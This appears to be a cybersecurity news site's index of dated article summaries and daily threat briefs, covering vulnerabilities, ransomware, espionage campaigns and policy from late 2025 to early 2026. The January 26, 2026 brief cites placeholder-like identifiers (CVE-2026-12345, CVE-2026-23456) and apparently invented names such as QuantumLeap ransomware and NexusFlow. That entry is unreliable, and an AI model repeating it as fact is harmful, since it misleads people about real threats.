Meredith Whittaker, the president of the Signal Foundation, has declared that the encrypted messaging service will withdraw from the European Union if the controversial 'Chat Control' legislation is enacted. The proposed law, which faces a critical vote on October 14, would mandate that communication platforms like Signal and WhatsApp scan all user content, including private messages and photos, for illicit material before it is encrypted. Critics, including Signal, argue this would create a backdoor for mass surveillance, fundamentally break end-to-end encryption, and create a dangerous cybersecurity precedent. The statement is a direct appeal to EU member states, particularly Germany, to vote against the measure.

Oct 7, 20254 min read

CISA Warns of Actively Exploited Windows Privilege Escalation Flaw (CVE-2021-43226)

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added CVE-2021-43226, a high-severity privilege escalation vulnerability in the Microsoft Windows Common Log File System (CLFS) Driver, to its Known Exploited Vulnerabilities (KEV) catalog. The action, taken on October 6, 2025, confirms the flaw is being actively exploited in the wild. The vulnerability allows a local, authenticated attacker to execute code with SYSTEM-level privileges by leveraging a buffer overflow. The flaw affects a wide range of Windows versions, including Windows 10, 11, and Server editions. Federal agencies have been directed to patch the vulnerability by October 27, 2025.

Oct 7, 20254 min read

Jaguar Land Rover Begins Phased Restart a Month After Crippling Cyberattack

On October 7, 2025, Jaguar Land Rover (JLR) announced it is beginning a phased restart of its manufacturing plants, more than a month after a major cyberattack on August 31 halted its global operations. The attack disrupted everything from production lines and parts flow to retail systems. The restart is beginning cautiously, with engine plants and stamping operations coming online first, and full production is hoped for by the end of October. The incident has caused a significant financial blow, with sales dropping sharply in all markets. In response to the crisis, JLR has also launched a new financing program to support its struggling suppliers who have lost weeks of orders.

Oct 7, 20255 min read

AI Risk Disclosures Skyrocket Among S&P 500, Cybersecurity a Top Concern

A new report from The Conference Board, released on October 7, 2025, reveals a dramatic shift in corporate risk perception, with over 70% of S&P 500 companies now formally disclosing AI-related risks in their public filings. This is a massive jump from just 12% in 2023. Reputational damage is the most cited concern (38%), followed closely by cybersecurity risks (20%). Companies are increasingly worried about how AI expands the attack surface, introduces new vulnerabilities through third-party tools, and creates new legal and regulatory challenges. The findings highlight that while AI adoption is accelerating, corporate governance and oversight are still struggling to keep pace.

Oct 7, 20254 min read

Redis Patches Critical "RediShell" RCE Flaw (CVE-2025-49844) in Lua Sandbox

Redis has released patches for CVE-2025-49844, a critical use-after-free vulnerability nicknamed "RediShell" by the Wiz researchers who discovered it. The flaw, announced on October 7, 2025, allows an authenticated attacker to escape the Lua sandbox and achieve remote code execution (RCE) on the underlying server. The risk is especially high for the estimated 330,000 internet-exposed Redis instances, around 60,000 of which are believed to have no authentication enabled. Because official Redis container images disable authentication by default, these instances are vulnerable to unauthenticated RCE. Security agencies like Germany's BSI are warning of imminent exploitation.

Oct 7, 20255 min read

Digicloud Africa to Distribute Google's AI-Powered SecOps Platform Across Continent

Digicloud Africa, a major Google Cloud distributor, announced on October 6, 2025, that it has partnered with Google Security Operations. This collaboration will make Google's advanced, AI-driven cybersecurity solutions, including its cloud-native SIEM and SOAR platform, available to enterprises and organizations across the African continent. The partnership aims to help African businesses modernize their security posture, moving from reactive to proactive, intelligence-driven defense strategies to combat the growing complexity of cyber threats in the region.

Oct 7, 20253 min read

CISA Warns of Widespread Flaws in Industrial Control Systems from Major Vendors

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has released a series of advisories warning of numerous vulnerabilities in Industrial Control Systems (ICS) from prominent vendors, including Rockwell Automation, Hitachi Energy, Mitsubishi Electric, and Delta Electronics. These flaws affect products widely deployed in the energy sector and other critical infrastructure domains. CISA is urging administrators to review the advisories and apply patches and mitigations immediately to prevent potential exploitation that could lead to operational disruptions or cyberattacks against critical national infrastructure.

Oct 6, 20254 min read

Microsoft Patches 3 Zero-Days Under Active Attack in Massive October Update

Microsoft has released its October 2025 Patch Tuesday update, a colossal release addressing 175 security flaws across its product suite. The update is highlighted by emergency patches for three zero-day vulnerabilities confirmed to be actively exploited in the wild. These critical flaws, now added to CISA's KEV catalog, include two privilege escalation bugs in Windows components (CVE-2025-59230 and CVE-2025-24990) and a Secure Boot bypass (CVE-2025-47827). The update also fixes a critical 9.8 CVSS RCE vulnerability in WSUS (CVE-2025-59287), posing a significant supply-chain risk. Administrators are urged to apply these updates immediately to mitigate active threats.

Oct 6, 20255 min read

Chinese APT Flax Typhoon Weaponizes ArcGIS Server as Persistent Backdoor in Year-Long Spy Campaign

The China-linked threat group Flax Typhoon (also known as Ethereal Panda) conducted a sophisticated, year-long espionage campaign against a government agency by compromising an Esri ArcGIS server. According to researchers at ReliaQuest, the attackers modified a legitimate Java server object extension (SOE) to create a persistent web shell. This backdoor, combined with extensive use of living-off-the-land techniques like PowerShell and a renamed SoftEther VPN client, allowed the APT group to maintain long-term access, move laterally, and harvest credentials while evading detection by hiding within legitimate server traffic.

Oct 6, 20255 min read

Qilin Ransomware Cripples Asahi Breweries, Demands $10 Million Ransom

The Qilin ransomware group has claimed responsibility for a devastating cyberattack against Asahi Group Holdings, one of Japan's largest beverage companies. The attack, which occurred in late September, forced the company to halt production at 30 factories and suspend shipments, leading to significant operational and financial disruption. The threat actors are now reportedly demanding a $10 million ransom to prevent the public release of exfiltrated company data, employing a classic double extortion tactic. The incident highlights the increasing trend of ransomware gangs targeting the manufacturing sector to maximize impact and pressure victims into paying large ransoms.

Oct 6, 20255 min read

Phishing Campaign Abuses NPM and UNPKG CDN to Steal Credentials

A sophisticated phishing campaign, dubbed "Beamglea," is abusing the public NPM registry and the trusted unpkg.com CDN to host and deliver credential-stealing malware. Researchers at Socket discovered over 175 malicious, disposable NPM packages created solely to serve a malicious JavaScript file. Attackers send HTML lures to victims that load the script from the reputable unpkg.com domain, bypassing traditional domain-based security filters. This technique, which has targeted over 135 organizations in Europe, represents a dangerous evolution in supply chain abuse, turning developer infrastructure into a tool for direct phishing attacks.

Oct 6, 20254 min read

G7 Cyber Experts Issue Statement on Managing AI Risks in Financial Sector

The G7 Cyber Expert Group (CEG) has issued a formal statement on the cybersecurity implications of Artificial Intelligence (AI) within the financial sector. Released on October 6, 2025, the document highlights the dual nature of AI, acknowledging its potential to bolster cyber defenses while also warning that it can amplify existing threats and introduce new vulnerabilities. The G7 CEG urges financial institutions and regulators to proactively develop robust governance and risk management frameworks to ensure the secure and resilient adoption of AI, promoting collaboration to establish global best practices.

Oct 6, 20254 min read

"Maverick": New Banking Trojan Spreads via WhatsApp in Brazil

A new and sophisticated fileless banking Trojan named "Maverick" is spreading rapidly in Brazil through a large-scale WhatsApp campaign. According to Kaspersky researchers, the malware is delivered via ZIP archives containing malicious LNK files, a method that bypasses the platform's file-blocking. Maverick operates entirely in memory to evade detection, using PowerShell and encrypted shellcode to steal credentials for 26 Brazilian banks and multiple cryptocurrency exchanges. The Trojan also features a worm-like self-propagation mechanism, hijacking the victim's WhatsApp Web session to automatically send the malicious payload to all their contacts.

Oct 6, 20255 min read

Intelligence Publications

CISA Mandates Edge Device Purge Amid Wave of Zero-Day Exploits and Sophisticated Supply Chain Attacks

This cybersecurity brief for February 9, 2026, covers a critical period marked by aggressive state-sponsored attacks and widespread vulnerabilities. Key developments include a CISA directive forcing federal agencies to remove unsupported edge devices, the rapid exploitation of a Microsoft Office zero-day by Russia's APT28, and a sophisticated supply chain attack on Notepad++ attributed to a Chinese APT. Further incidents include a crippling ransomware attack on the BridgePay payment gateway and the discovery of critical zero-days in Ivanti and BeyondTrust products, highlighting urgent risks across government, finance, and technology sectors.

Feb 8, 20268 articles

CISA Warns of Actively Exploited SmarterMail RCE Flaw; BridgePay Payment Gateway Crippled by Ransomware

A critical, actively exploited RCE vulnerability (CVE-2026-24423) in SmarterMail has been added to CISA's KEV catalog, fueling ransomware attacks. Concurrently, a major ransomware incident has crippled the BridgePay payment gateway, causing nationwide outages for merchants. Other significant developments in the past 24 hours include CISA mandating the removal of unsupported edge devices from federal networks, attribution of a Notepad++ supply chain attack to a Chinese APT, and the discovery of a new EDR-killing malware that abuses a decade-old driver.

Feb 7, 20267 articles

CISA Warns of Actively Exploited SmarterMail RCE; Asian APT Hits 70 Orgs; 'Shai-Hulud' Worm Automates Supply Chain Attacks

This cybersecurity brief for February 7, 2026, covers multiple critical threats. CISA has added a SmarterMail RCE vulnerability (CVE-2026-24423) to its KEV catalog due to active exploitation in ransomware attacks. A massive year-long cyber-espionage campaign by an Asian APT group, TGR-STA-1030, has compromised at least 70 government and critical infrastructure organizations across 37 nations. Additionally, a new self-propagating worm, 'Shai-Hulud,' is automating software supply chain attacks by stealing developer credentials to infect npm packages. Other major developments include CISA's new directive to remove unsupported edge devices from federal networks and the discovery of new malware strains like Odyssey Stealer, Milkyway Ransomware, and the covert Pulsar RAT.

Feb 6, 20267 articles

Global Espionage 'Shadow Campaign' Breaches 37 Nations; CISA Warns of Actively Exploited Flaws in SmarterMail and VMware

This week in cybersecurity, a massive state-aligned espionage operation dubbed the 'Shadow Campaign' was uncovered, having compromised government and critical infrastructure entities in 37 countries. Meanwhile, CISA issued urgent warnings about actively exploited vulnerabilities in SmarterMail and VMware ESXi, both being used in ransomware attacks. Major data breaches also came to light, with an unsecured server exposing 8.7 billion records on Chinese citizens and social engineering attacks hitting investment platform Betterment and newsletter service Substack, affecting millions of users. In policy news, CISA mandated the removal of all unsupported edge devices from federal networks to combat nation-state threats.

Feb 5, 20268 articles

APT28 Exploits Office Zero-Day in Hours; Critical N8N Flaw Exposes 100K Servers; ShinyHunters Breaches Harvard

In the period of February 4-5, 2026, the cybersecurity landscape was dominated by rapid state-sponsored exploitation and critical vulnerability disclosures. The Russian APT28 group weaponized a Microsoft Office zero-day (CVE-2026-21509) within 24 hours to target European governments. Concurrently, a CVSS 10.0 RCE flaw (CVE-2026-21858) in the N8N automation platform left over 100,000 servers vulnerable to takeover. Adding to the incidents, the ShinyHunters collective claimed a major data breach at Harvard University, exposing 115,000 donor records through a sophisticated vishing campaign. Other significant events include patches from Cisco and F5, and CISA adding a SolarWinds flaw to its KEV catalog.

Feb 4, 20268 articles

Russian APT Exploits Patched Office Flaw in Days; Chinese Spies Hijack Notepad++ Updates

The cybersecurity landscape on February 4th, 2026, is dominated by sophisticated state-sponsored attacks. The Russian APT28 group was caught weaponizing a freshly patched Microsoft Office zero-day vulnerability (CVE-2026-21509) within days, targeting European entities. In a separate, long-running campaign, a Chinese APT compromised the Notepad++ update mechanism in a six-month supply chain attack. Other major incidents include the resurfacing of a massive AT&T customer dataset with 176 million records, a widespread DDoS campaign by pro-Russian hacktivists, and critical vulnerability disclosures for Django and Ingress-NGINX.

Feb 3, 20269 articles

Notepad++ Supply Chain Attack by Chinese APT; Russian Group Exploits Office Zero-Day

A sophisticated supply chain attack targeting the popular Notepad++ editor, attributed to the Chinese APT group Lotus Blossom, has been uncovered, selectively deploying malware to users in Southeast Asia. Concurrently, the Russian-backed APT28 is actively exploiting a new Microsoft Office zero-day vulnerability (CVE-2026-21509) to target entities in Eastern Europe. Ransomware remains a dominant threat, with the Qilin group claiming an attack on Tulsa International Airport and other groups targeting US law firms and manufacturing. These events highlight a landscape of escalating state-sponsored espionage and persistent criminal activity targeting critical infrastructure and corporate entities.

Feb 2, 202611 articles

Russian Hackers Target Polish Grid, Multiple Supply Chain Attacks, and Two Critical Zero-Days Under Active Exploitation

This edition covers a series of high-impact cybersecurity events for February 2nd, 2026. Key developments include a destructive but failed wiper attack on Poland's energy sector by the Russian-linked Sandworm group. The software supply chain remains a primary target, with attacks compromising both eScan antivirus update servers and the Open VSX marketplace. Concurrently, Microsoft and Fortinet are racing to patch critical, actively exploited zero-day vulnerabilities in Office and FortiGate firewalls, respectively. Other major stories include the rise of AI-assisted malware and phishing, a new stealthy RAT, and a significant data breach at an AI social network.

Feb 1, 20269 articles

Ivanti Zero-Days Under Active Attack as Polish Energy Grid Hit by Destructive Wiper Malware

This edition covers the critical cybersecurity landscape for February 1, 2026. Dominating the headlines are two actively exploited zero-day vulnerabilities in Ivanti's EPMM, prompting an emergency CISA directive. Simultaneously, a sophisticated wiper malware attack, potentially linked to Russian state-actors like Sandworm, targeted over 30 energy facilities in Poland, aiming to disrupt critical infrastructure. Other major events include an FBI takedown of the RAMP ransomware forum, a supply chain attack compromising eScan antivirus, and an advanced vishing campaign mimicking ShinyHunters to breach SaaS platforms. These incidents highlight escalating threats against enterprise software, critical infrastructure, and the software supply chain.

Jan 31, 20269 articles

Active Exploits Target Ivanti & Microsoft Office; Sandworm Deploys New Wiper in Poland

This cybersecurity brief for January 30, 2026, covers multiple critical threats, including actively exploited zero-day vulnerabilities in Ivanti EPMM and Microsoft Office, both requiring immediate patching. A sophisticated phishing campaign linked to the ShinyHunters alliance is targeting Okta SSO credentials at over 100 enterprises using voice phishing. Concurrently, the Sandworm threat actor has deployed a new destructive wiper, DynoWiper, against the Polish energy sector. Other major developments include a surge in DDoS attacks from new botnets, the discovery of the Sicarii ransomware operation, and a report detailing over 450,000 malicious open-source packages published in 2025.

Jan 29, 20266 articles

Actively Exploited Zero-Days in Microsoft Office & Fortinet; Major Brands Hit by Cyberattacks

This 24-hour period saw critical cybersecurity developments, including the active exploitation of zero-day vulnerabilities in Microsoft Office (CVE-2026-21509) and Fortinet's FortiCloud SSO (CVE-2026-24858), both added to CISA's KEV list. A wave of social engineering attacks impacted major brands like Bumble, Match, Panera, and Crunchbase, attributed to the 'ShinyHunters' group. Additionally, significant data breaches were reported at SoundCloud, affecting 29.8 million users, and the Illinois Department of Human Services, exposing data of 700,000 individuals. Research reports from Check Point and Sonatype highlight the increasing use of AI by attackers and a 75% surge in open-source malware, underscoring the escalating complexity of the threat landscape.

Jan 28, 20268 articles

Microsoft and Fortinet Race to Patch Actively Exploited Zero-Days as ShinyHunters Claims Massive Match Group Breach

This 24-hour period saw urgent, out-of-band patches from major vendors to combat actively exploited zero-day vulnerabilities. Microsoft issued an emergency fix for a critical Office security bypass (CVE-2026-21509), while Fortinet scrambled to address a critical SSO authentication bypass (CVE-2026-24858), both of which were added to CISA's KEV catalog. In the data breach landscape, the ShinyHunters group claimed a massive breach of Match Group, allegedly compromising 10 million user records from Hinge and OkCupid. Additionally, SolarWinds disclosed five critical RCE and auth bypass flaws in its Web Help Desk, and the Illinois Department of Human Services confirmed a breach affecting 700,000 individuals.

Jan 27, 202610 articles

Microsoft Patches Actively Exploited Office Zero-Day as Ransomware Groups Target Major Supply Chains

This cybersecurity brief for January 27, 2026, covers multiple critical incidents, led by an emergency out-of-band patch from Microsoft for an actively exploited zero-day (CVE-2026-21509) in Office, prompting a CISA directive. Concurrently, the RansomHub group has claimed a major attack on Apple supplier Luxshare, and the fallout from a previous breach at Under Armour sees 72 million customer records leaked. Other significant events include a critical RCE flaw patched in Zoom, active exploitation of a Fortinet SSO bypass, and the EU's proposal for a revised Cybersecurity Act to counter supply chain threats.

Jan 26, 20268 articles

QuantumLeap Ransomware Halts Global Logistics; Critical Zero-Days in NexusFlow and Mobile OSes Actively Exploited

A tumultuous day in cybersecurity for January 26, 2026, is marked by high-impact ransomware, critical zero-day vulnerabilities, and sophisticated nation-state espionage. The newly identified QuantumLeap ransomware has crippled logistics giant NaviGistics, demanding a $50 million ransom. Concurrently, a wormable RCE zero-day (CVE-2026-12345) in the NexusFlow API Gateway and a zero-click flaw (CVE-2026-23456) in iOS and Android are under active attack. Other major incidents include a supply chain attack on a popular NPM package, an AI-powered phishing campaign bypassing MFA, and continued espionage from threat actors like Volt Typhoon and SteelHydra targeting critical infrastructure and renewable energy sectors.

Jan 25, 202611 articles

Massive 149M Credential Leak, Sandworm's 'DynoWiper' Targets Poland, and FortiGate Firewalls Breached Despite Patches

This cybersecurity brief for January 25, 2026, covers a series of critical incidents. A massive 149 million credential leak has exposed users of Gmail, Facebook, and financial services. The Russian state-sponsored group Sandworm deployed a new 'DynoWiper' malware in an attack on Poland's power grid. Fully patched FortiGate firewalls are being compromised via a new SSO bypass. Other major events include data breach claims against Nike and Under Armour, a critical 11-year-old Telnet vulnerability, and multiple patch-related issues from Microsoft causing boot failures and application freezes.

Jan 24, 20269 articles

Critical 11-Year-Old Telnet Flaw Under Active Exploit; Pwn2Own Exposes Major Automotive Zero-Days

This cybersecurity brief for January 24, 2026, covers several critical developments. A severe 11-year-old vulnerability in GNU's telnetd service (CVE-2026-24061) is now under active exploitation, granting attackers root access. The Pwn2Own Automotive event saw researchers earn over $1 million for 76 zero-days, including 37 against Tesla. Meanwhile, CISA added four new flaws to its KEV catalog, the DragonForce ransomware group targeted a U.S. bank, and Microsoft issued emergency patches to fix recent update issues. Phishing campaigns targeting LastPass users and leveraging LinkedIn for RAT distribution are also on the rise.

Jan 23, 20265 articles

CISA Warns of Actively Exploited Flaws; North Korean Hackers Target Developers; Ransomware Hits Apple Supplier

This week in cybersecurity, CISA added four actively exploited vulnerabilities to its KEV catalog, demanding urgent patching from federal agencies. North Korean threat actors launched the 'Contagious Interview' campaign, using malicious VS Code projects to backdoor developers' systems. In the supply chain, a major Apple partner, Luxshare, was breached by the RansomHub group, leaking sensitive product designs. Meanwhile, new ransomware strains like Osiris and Anubis emerged with advanced TTPs, including data-wiping capabilities, and Oracle released a massive patch update fixing 337 vulnerabilities, one with a perfect 10.0 CVSS score.

Jan 22, 20269 articles

Cisco Zero-Day Under Active Attack as Oracle Drops Massive 337-Flaw Patch Update and Everest Ransomware Hits Major Brands

The cybersecurity landscape for January 22, 2026, is dominated by critical vulnerabilities and high-profile cyberattacks. Cisco is racing to patch an actively exploited zero-day RCE flaw (CVE-2026-20045) in its communications products, which CISA has added to its KEV catalog. Oracle released a massive January Critical Patch Update addressing 337 flaws, over 235 of which are remotely exploitable. Meanwhile, the Everest ransomware group has been highly active, claiming major data breaches at Under Armour and McDonald's India, threatening to leak data for millions of customers. Other significant events include critical patches from Zoom and GitLab, and reports highlighting the growing risks of supply chain attacks through both SaaS platforms and misconfigured security training applications.

Jan 21, 202612 articles

EU Proposes Ban on High-Risk Tech, AI-Generated Malware Emerges, and Ransomware Hits Apple Supplier Luxshare

This cybersecurity brief for January 21, 2026, covers significant global developments. The EU has proposed a revised Cybersecurity Act to ban high-risk tech suppliers from critical sectors, a move largely targeting Chinese firms. In threat intelligence, researchers have detailed 'VoidLink,' a sophisticated Linux malware framework believed to be one of the first advanced threats predominantly built with AI assistance. Meanwhile, the RansomHub group claims a major breach against Apple supplier Luxshare, threatening to leak sensitive R&D data, and Oracle has released a critical patch for a CVSS 10.0 vulnerability in WebLogic Server.

Jan 20, 20266 articles

Ingram Micro Breach Exposes 42k; UK Warns of Pro-Russia DDoS; New Ransomware Threats Emerge

In the last 24 hours, the cybersecurity landscape has been dominated by major data breach disclosures, state-sponsored threat alerts, and the evolution of the ransomware ecosystem. IT distributor Ingram Micro confirmed a ransomware attack from mid-2025 impacted over 42,000 individuals, exposing sensitive PII. Simultaneously, the UK's NCSC issued a formal warning about persistent DDoS attacks from Russian-aligned hacktivists targeting critical infrastructure. New malware campaigns like 'PDFSIDER' and 'Evelyn Stealer' showcase increasingly sophisticated evasion techniques, while emerging threat groups like DragonForce signal a consolidation in the RaaS market.

Jan 19, 20269 articles

Google Gemini Flaw Exposes Calendar Data; Black Basta Ransomware Leader on EU's Most Wanted

This cybersecurity advisory for January 19, 2026, covers a significant increase in sophisticated attacks. Key developments include a novel prompt injection vulnerability in Google Gemini allowing calendar data theft, an international manhunt for the leader of the Black Basta ransomware group, and a surge in cloud and supply chain attacks. Other critical stories include the discovery of Evelyn Stealer malware targeting developers via VS Code extensions, critical vulnerabilities in TP-Link cameras and various business software with public exploits, and a doubling of data breaches in the healthcare sector.

Jan 18, 202612 articles

Palo Alto Networks Patches Critical Firewall Flaw; Microsoft Dismantles RedVDS Cybercrime Service

In the last 24 hours, the cybersecurity landscape has been marked by significant defensive actions and disclosures. Palo Alto Networks released urgent patches for a high-severity denial-of-service vulnerability (CVE-2026-0227) affecting its firewalls, allowing attackers to remotely disable network protection. In a major blow to cybercrime infrastructure, Microsoft and global law enforcement agencies successfully dismantled the RedVDS 'Cybercrime-as-a-Service' platform, which was responsible for over $40 million in fraud. Concurrently, the NSA published new foundational guidelines for Zero Trust adoption, aiming to bolster national cybersecurity posture. Other key developments include strategic product launches and acquisitions from Infoblox, SpyCloud, and Acronis, all focused on enhancing threat visibility and response capabilities.

Jan 16, 202611 articles

AWS CodeBreach Exposes Massive Supply Chain Risk; Ransomware Attacks Hit Record Highs in 2025

This cybersecurity publication for January 16, 2026, covers a series of critical developments, led by the disclosure of the 'CodeBreach' vulnerability in AWS CodeBuild, which posed a severe supply chain threat to countless applications. Concurrently, new reports confirm that 2025 was a record-breaking year for ransomware, with a 58% surge in attacks. Other major incidents include the Everest ransomware group's claimed breach of Nissan, active exploitation of a critical WordPress plugin flaw, and the discovery of sophisticated malware frameworks like VoidLink targeting cloud environments and GlassWorm targeting macOS developers.

Jan 15, 20266 articles

Microsoft Patches Actively Exploited Zero-Day; Massive Data Breaches Impact Millions in France and US Healthcare

In the period ending January 15, 2026, the cybersecurity landscape was dominated by Microsoft's January Patch Tuesday, which addressed an actively exploited zero-day (CVE-2026-20805). Concurrently, several massive data breaches came to light, including a leak exposing the records of 45 million French citizens and significant intrusions at healthcare and educational institutions in the US and New Zealand. New threats also emerged, with reports on the industrialization of npm supply chain attacks and the discovery of VoidLink, a sophisticated Linux malware framework targeting cloud environments.

Jan 14, 20264 articles

CISA Mandates Patches for Exploited Windows & Gogs Zero-Days; Ransomware Cripples Hospital & Energy Giant Breached

In the last 24 hours, the cybersecurity landscape has been dominated by critical vulnerability disclosures and high-impact cyberattacks. The U.S. CISA has added two actively exploited zero-day vulnerabilities to its KEV catalog: a Windows information disclosure flaw (CVE-2026-20805) and a Gogs RCE flaw (CVE-2025-8110), mandating urgent action from federal agencies. In Europe, a suspected ransomware attack crippled Belgium's AZ Monica hospital, forcing the transfer of critical patients, while Spanish energy giant Endesa confirmed a massive data breach with a threat actor claiming to hold data on 20 million people. These incidents are compounded by new threat intelligence on evolving tactics from Russian GRU hackers and a strategic shift in the ransomware ecosystem towards encryptionless extortion.

Jan 13, 20269 articles

CISA KEV Alert for Gogs RCE Flaw; BreachForums Database Leaked; AI Threats Forecasted to Rise

This cybersecurity brief for January 13, 2026, covers several major incidents. CISA has added a critical, actively exploited Gogs vulnerability (CVE-2025-8110) to its KEV catalog, demanding urgent patching. In a significant blow to the cybercrime ecosystem, the user database of the notorious BreachForums was leaked, exposing nearly 324,000 members. Additionally, telecom provider Brightspeed is investigating a major breach claim, while reports from Experian and Everstream Analytics forecast a surge in AI-driven attacks and cyber threats against the global supply chain. Other key events include a critical 10.0 CVSS vulnerability in the n8n automation platform and a new roadmap from the G7 for post-quantum cryptography in the financial sector.

Jan 12, 20264 articles

CrazyHunter Ransomware Hits Taiwanese Healthcare, G7 Warns on Quantum Threats, and Malicious npm Packages Target n8n

A cybersecurity summary for January 12, 2026, covering a surge in targeted attacks and strategic warnings. Highlights include the 'CrazyHunter' ransomware crippling Taiwanese healthcare with advanced tactics, a G7 directive urging the financial sector to prepare for post-quantum cryptography, and a new supply chain attack using malicious npm packages to steal credentials from the n8n automation platform. Other major events include a massive DDoS campaign against the UK by pro-Russian hacktivists and a WEF report identifying cyber-fraud as the new top global threat.

Jan 11, 20265 articles

Instagram Denies Breach Amid Data Leak Panic; Ransomware Hits French and Japanese Giants

This cybersecurity brief for January 11, 2026, covers a tumultuous period marked by a major data leak scare at Instagram affecting 17.5 million users, which the company attributes to a bug rather than a breach. Meanwhile, ransomware groups continue their assault on major corporations, with the Qilin group targeting French infrastructure firm Bouygues and the Everest group claiming a massive 900 GB data theft from Nissan. Nation-state activity also remains high, as Iran-linked MuddyWater deploys a new 'RustyWater' RAT in the Middle East, and Chinese APT 'Salt Typhoon' is linked to a hack of U.S. Congressional staff emails. Other significant events include a healthcare data breach in New Zealand, a novel 'quishing' scam in France, and a critical vulnerability disclosed in the Mailpit developer tool.

Jan 10, 20269 articles

Chinese Hackers Caught Exploiting VMware Zero-Days for Over a Year; FBI Warns of North Korean 'Quishing' Attacks

This cybersecurity brief for January 10, 2026, covers several critical developments. A sophisticated Chinese-linked threat actor was discovered exploiting a trio of VMware ESXi zero-days for more than a year before they were patched, enabling full VM escapes. The FBI has issued a warning about the North Korean Kimsuky APT using QR code phishing ('quishing') to bypass email security and steal credentials. Additionally, major data breaches have been disclosed by the Illinois Department of Human Services, affecting 700,000 residents, and online gambling firm BetVictor. CISA has also added a critical, actively exploited HPE OneView vulnerability to its KEV catalog, mandating urgent patching.

Jan 9, 20268 articles

Critical 'Ni8mare' Flaw Hits n8n; Chinese Hackers Wielded VMware Zero-Day for a Year

This cybersecurity brief for January 9, 2026, covers a critical unauthenticated RCE vulnerability (CVSS 10.0) in the n8n platform, revelations that a Chinese state-sponsored actor possessed a VMware ESXi zero-day exploit for over a year before its disclosure, and an FBI warning about North Korean 'quishing' campaigns. Other major events include data breaches affecting London councils and New Zealand's largest patient portal, new malware strains like Ripper Ransomware, and CISA adding actively exploited flaws in HPE and legacy PowerPoint to its KEV catalog.

Jan 8, 20269 articles

Critical RCE Flaws in n8n and D-Link Routers Under Active Exploitation; CISA Issues Urgent Warnings

This cybersecurity brief for January 8, 2026, covers a series of critical vulnerabilities and active threats. Headlining the news are two maximum-severity (CVSS 10.0) remote code execution flaws in the n8n workflow automation platform, one unauthenticated and one authenticated, prompting urgent patching. Concurrently, a zero-day RCE is being actively exploited in end-of-life D-Link routers, with no patch forthcoming. CISA has added exploited flaws in HPE OneView and legacy PowerPoint to its KEV catalog. Major incidents include a data breach claim against broadband provider Brightspeed by the Crimson Collective, a ransomware attack on claims giant Sedgwick by TridentLocker, and a large-scale SEO poisoning campaign by the Black Cat group. Additionally, reports highlight novel phishing tactics abusing Microsoft 365 and Google Cloud services, and malicious Chrome extensions stealing AI chat data from nearly a million users.

Jan 7, 20265 articles

Critical RCEs in n8n, Microsoft Warns of Phishing Surge, and Lapsus$ Group Resurfaces

This cybersecurity publication for January 7, 2026, covers a series of critical threats and developments. Highlights include the disclosure of two maximum-severity unauthenticated and authenticated RCE vulnerabilities (CVSS 10.0) in the n8n automation platform, a major warning from Microsoft about a surge in phishing attacks exploiting email routing and DNS misconfigurations, and intelligence suggesting the Lapsus$ extortion group has resurfaced with evolved tactics. Other key stories include the 'Zestix' actor breaching 50 companies via stolen credentials on MFA-less portals, a ransomware attack on claims giant Sedgwick by the TridentLocker group, and significant updates to US data privacy laws and UK government cyber strategy.

Jan 6, 20269 articles

Ransomware & Supply Chain Attacks Proliferate as TridentLocker Hits Gov't Contractor and Cl0p Breaches Korean Air

This cybersecurity brief for January 6, 2026, covers a surge in high-impact incidents. Key events include a confirmed ransomware attack on a Sedgwick government subsidiary by the new TridentLocker group and a major supply chain breach at Korean Air via a vendor, attributed to Cl0p. Additionally, the Kimwolf botnet has infected over two million Android devices, Microsoft warns of phishing attacks exploiting email routing flaws, and new state-level privacy laws have taken effect across the U.S., increasing compliance burdens.

Jan 5, 20265 articles

Ransomware Supply Chain Attacks Surge; Critical Flaws in Medical and IoT Devices Exposed

This cybersecurity brief for January 5, 2026, covers a wave of high-impact supply chain attacks, with ransomware groups like TridentLocker and Cl0p breaching major federal and corporate vendors. A massive data breach at 700Credit exposed 5.6 million consumer records, while critical vulnerabilities were disclosed in WHILL power wheelchairs and popular headphone brands, posing both physical and digital risks. Additionally, the RondoDox botnet is actively exploiting a CVSS 10.0 flaw in web frameworks.

Jan 4, 20263 articles

China's Cyber War on Taiwan Intensifies; Critical Flaws in IoT and Enterprise Software Actively Exploited

A cybersecurity report for January 4, 2026, reveals a significant escalation in state-sponsored cyberattacks, with a Taiwanese government report detailing over 2.6 million daily attacks from China in 2025. Concurrently, critical vulnerabilities are under active exploitation, including a memory disclosure flaw in MongoDB ('Mongobleed') added to CISA's KEV list, and a zero-day in Oracle E-Business Suite leveraged by the Clop group. The IoT landscape is also under fire, with critical remote hijacking flaws discovered in WHILL electric wheelchairs and Petlibro smart feeders, highlighting severe physical and privacy risks. Major data breaches continue to have fallout, with 700Credit exposing 5.6 million consumer records via API abuse and Cognizant facing lawsuits over its TriZetto healthcare data breach.

Jan 3, 20267 articles

Iranian-Linked Hackers Dox Israeli Intel Agents; Critical Flaws in Fortinet & Next.js Actively Exploited

This cybersecurity brief for January 3, 2026, covers several critical developments. The Iran-linked Handala group has escalated its psychological warfare campaign by doxing Israeli SIGINT officers, primarily through Telegram account compromises. Meanwhile, critical, actively exploited vulnerabilities in Fortinet firewalls (CVE-2020-12812) and Next.js (CVE-2025-55182) are being leveraged by threat actors for 2FA bypass and botnet creation, respectively. Other major incidents include a massive data breach claim against Tokyo FM radio, the rise of the VVS Stealer malware, and a widespread phishing campaign abusing Google Tasks.

Jan 2, 20268 articles

Critical Flaws, Ransomware Breaches, and Supply Chain Attacks Dominate Early 2026

The cybersecurity landscape for January 2, 2026, is marked by a series of high-impact incidents, including multiple critical vulnerabilities with CVSS scores of 9.8 and 10.0 being actively exploited or posing severe risks. Major data breaches in the healthcare sector, attributed to ransomware gangs like Qilin, have exposed the sensitive information of hundreds of thousands of individuals. Concurrently, sophisticated supply chain attacks continue to prove effective, with a crypto wallet losing millions and Apple's manufacturing partners facing threats. Phishing campaigns also evolved, abusing legitimate cloud services to bypass traditional defenses.

Jan 1, 20263 articles

Iranian APTs Evolve with Telegram C2, Ransomware Industrializes, and Critical Flaws Threaten Global Servers to Kick Off 2026

